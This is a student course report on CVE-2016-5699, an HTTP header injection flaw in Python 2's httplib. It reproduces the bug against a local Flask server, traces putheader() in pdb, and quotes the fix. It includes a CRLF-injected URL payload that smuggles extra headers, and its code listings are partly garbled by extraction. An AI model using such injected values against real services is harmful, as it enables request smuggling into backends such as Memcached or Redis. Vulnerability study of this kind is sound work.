CS 294: Reading Course Report HTTP header Injection in Python httplib

Jinzheng Sha, F0025JV

August 2016

1 Introduction

It was found that Python's built-in httplib library (httplib.py in Python 2.x and http/client.py in Python 3.x) was vulnerable to header injection since it did not properly validate the parameters passed to HTTPConnection.putheader(). The vulnerability was first noticed in 2014, and resolved in 2015.

This vulnerability does have certain affect, and there are several scenarios where it might be taken advantage of[1]. For example, it can be used to attack Memcached because hackers can inject database operations into URL, and manipulate security-critical data. Hackers can also use this to attack Redis, which works in a quite similar way to Memcached in terms of network protocol, and overwrite various files owned by the service user.

2 Proof of Concept

2.1 Vulnerable Environment Replicate

First of all, I created an EC2 instance with Ubuntu 14.04.5 LTS on AWS for further exploit. Since the default Python version in this Ubuntu is 2.7.6, and CVE-2016-5699 was not resolved until 2.7.10, I installed the latest Python 2 release, i.e. 2.7.12, from sources[2]. I also used virtualenv[3], a tool to create isolated Python environments, to compare how HTTP header injections are handled in those two Python versions.

I installed virtualenv, and created two Python environments using following commands:

```
pip install virtualenv
virtualenv -p /usr/local/lib/python2.7.12/bin/python venv-python
-2-7-12
virtualenv -p /usr/bin/python venv-python-2-7-6
```

2.2 Exploit

This exploit references the example as described at a Github repository[4].

To begin with, I used Flask[5], a microframework for Python, to construct a simple HTTP server. The server listens on port 8000, and if there is any incoming HTTP request on route /test-url, it would print headers of the request. The codes for the server are shown as below.

```
import sys
from flask import Flask, request

app = Flask(..name..)

@app.route('/test-url')
def view_func():
    print request.headers
    return 'Request received!'

if --name.. == '--main...':
    print 'Python version is %d.%d.%d' % (sys.version.info[0], sys.version.info[1], sys.version.info[2])
app.run(port=8000)
```

At the client side, what I need to implement is simply making HTTP requests to URL provided by users through a command line argument. The codes look like:

```
1 import sys
2 from urllib2 import urlopen
url = sys.argv[1]
6
7
      response = urlopen(url)
8
      print 'HTTP request succeeded, headers in reply:'
9
      print response.info()
10
11
  except ValueError as e:
12
      print 'HTTP request failed with error message:'
13
14
      print e.message
15
16 except Exception as e:
print "Other exceptions not related to our interest"
```

In my experiments, I ran the client script with two different URLs for comparison. One is the healthy URL; the other is the malicious one. The invocations are listed as below.

```
# healthy URL
python simple-client.py http://127.0.0.1:8000/test-url
# malicious URL
```

```
4 python simple-client.py http://127.0.0.1%0d%0aX-injected:%20header %0d%0ax-leftover:%20:8000/test-url
```

In Python 2.7.6, when I make request to the healthy URL, outputs of client side, as in Figure 1, and server side, as in Figure 2, show our client could talk to server successfully.

Figure 1: Python 2.7.6, client side, healthy URL

```
● ● ↑ JaySha — sha@ip-172-31-45-80: ~/cve-2016-5699-report — ssh -l sha 52.43.152.162 — 82×28
sha@ip-172-31-45-80: ~/cve-2016-5699-report — ssh -l s... | sha@ip-172-31-45-80: ~/cve-2016-5699-report — ssh -l s... | +
[(venv-python-2-7-6) sha@ip-172-31-45-80: ~/cve-2016-5699-report$ python simple-serv]
er.py
Python version is 2.7.6
* Running on http://127.0.0.1:8000/ (Press CTRL+C to quit)
Content-Length:
User-Agent: Python-urllib/2.7
Connection: close
Host: 127.0.0.1:8000
Content-Type:
Accept-Encoding: identity

127.0.0.1 - - [27/Aug/2016 04:47:31] "GET /test-url HTTP/1.1" 200 -
```

Figure 2: Python 2.7.6, server side, healthy URL

However, when using the malicious URL, I can still receive a response as in Figure 3. But this time, inside the headers printed out on the server side, as in Figure 4, a field called X-injected with value header draws our attention. That means I have successfully injected the HTTP header through manipulating the URL I are trying to visit.

Figure 3: Python 2.7.6, client side, malicious URL

```
127.0.0.1 - - [27/Aug/2016 04:48:46] "GET /test-url HTTP/1.1" 200 - Content-Length:
User-Agent: Python-urllib/2.7
Connection: close
X-Injected: header
Host: 127.0.0.1
X-Leftover: :8000
Content-Type:
Accept-Encoding: identity

127.0.0.1 - - [27/Aug/2016 04:48:49] "GET /test-url HTTP/1.1" 200 -
```

Figure 4: Python 2.7.6, server side, malicious URL

3 Code Analysis

With the help pdb, I found that the erroneous piece of code is function putheader() inside httplib.py, which creates the headers of HTTP request.

```
def putheader(self, header, *values):
    """Send a request header line to the server.

For example: h.putheader('Accept', 'text/html')
    """
    if self.__state != _CS_REQ_STARTED:
        raise CannotSendHeader()

hdr = '%s: %s' % (header, '\r\n\t'.join([str(v) for v in values ]))
    self._output(hdr)
```

This function's vulnerability is that it simply concatenates all the headers into a string without any check. In my experiments with malicious URL, parameters passed to putheader(), and return value are shown in Figure 5 and Figure 6.

```
[(Pdb) a
self = <httplib.HTTPConnection instance at 0x7f8050847638>
header = Host
values = ('127.0.0.1\r\nX-injected: header\r\nx-leftover: :8000',)
```

Figure 5: Parameters passed into putheader()

```
--Return--
> /usr/lib/python2.7/httplib.py(960)putheader()->None
-> self._output(hdr)
[(Pdb) hdr
'Host:_127.0.0.1\r\nX-injected: header\r\nx-leftover: :8000'
```

Figure 6: Local variable hdr after putheader() executed

Clearly, the injection was complete after the invocation of the function.

4 Fix

In Python 2.7.10, this vulnerability was handled by adding validations inside putheader(). Details can be found here[6]. Core parts of the patch are listed:

```
+_is_legal_header_name = re.compile(r'\A[^:\s][^:\r\n]*\Z').match
  +_is_illegal_header_value = re.compile(r'\n(?![\t])|\r(?![\t\n])'
      ).search
3
4 @@ -983,7 +1012,16 @@ class HTTPConnection:
            if self.__state != _CS_REQ_STARTED:
5
6
                 raise CannotSendHeader()
            hdr =  '%s: %s' % (header, '\r\n\t'.join([str(v) for v in
       values]))
            header = '%s' % header
9
            if \quad not \quad \_is\_legal\_header\_name\,(\,header\,):
10 +
                 raise ValueError ('Invalid header name %r' % (header,))
11 +
12
            values = [str(v) for v in values]
13
14
            for one_value in values:
                 if \quad \verb| is\_illegal_header\_value(one\_value): \\
15 +
16
                     raise ValueError ('Invalid header value %r' % (
       one_value,))
17
18 +
            hdr = \%s: \%s' \% (header, '\r\n\t'.join(values))
            self._output(hdr)
19
```

The check makes sure that header or value is valid only when \r\n\t appears.

In order to test the vulnerability has been fixed, I used Python 2.7.12 to see

what would happen when visiting a malicious URL. The result is shown as in Figure 7.

Figure 7: Python 2.7.12, client side, malicious URL

References

- [1] Advisory: HTTP Header Injection in Python urllib. URL: http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html.
- [2] Upgrade to Python 2.7.11 on Ubuntu 14.04 LTS. URL: http://mbless.de/blog/2016/01/09/upgrade-to-python-2711-on-ubuntu-1404-lts.html.
- [3] Virtualenv Website. URL: https://virtualenv.pypa.io/en/stable/.
- [4] Exploit example from Github. URL: https://github.com/bunseokbot/CVE-2016-5699-poc.
- [5] Flask. URL: http://flask.pocoo.org/.
- [6] Patch to CVE-2016-5699. URL: https://hg.python.org/cpython/rev/1c45047c5102.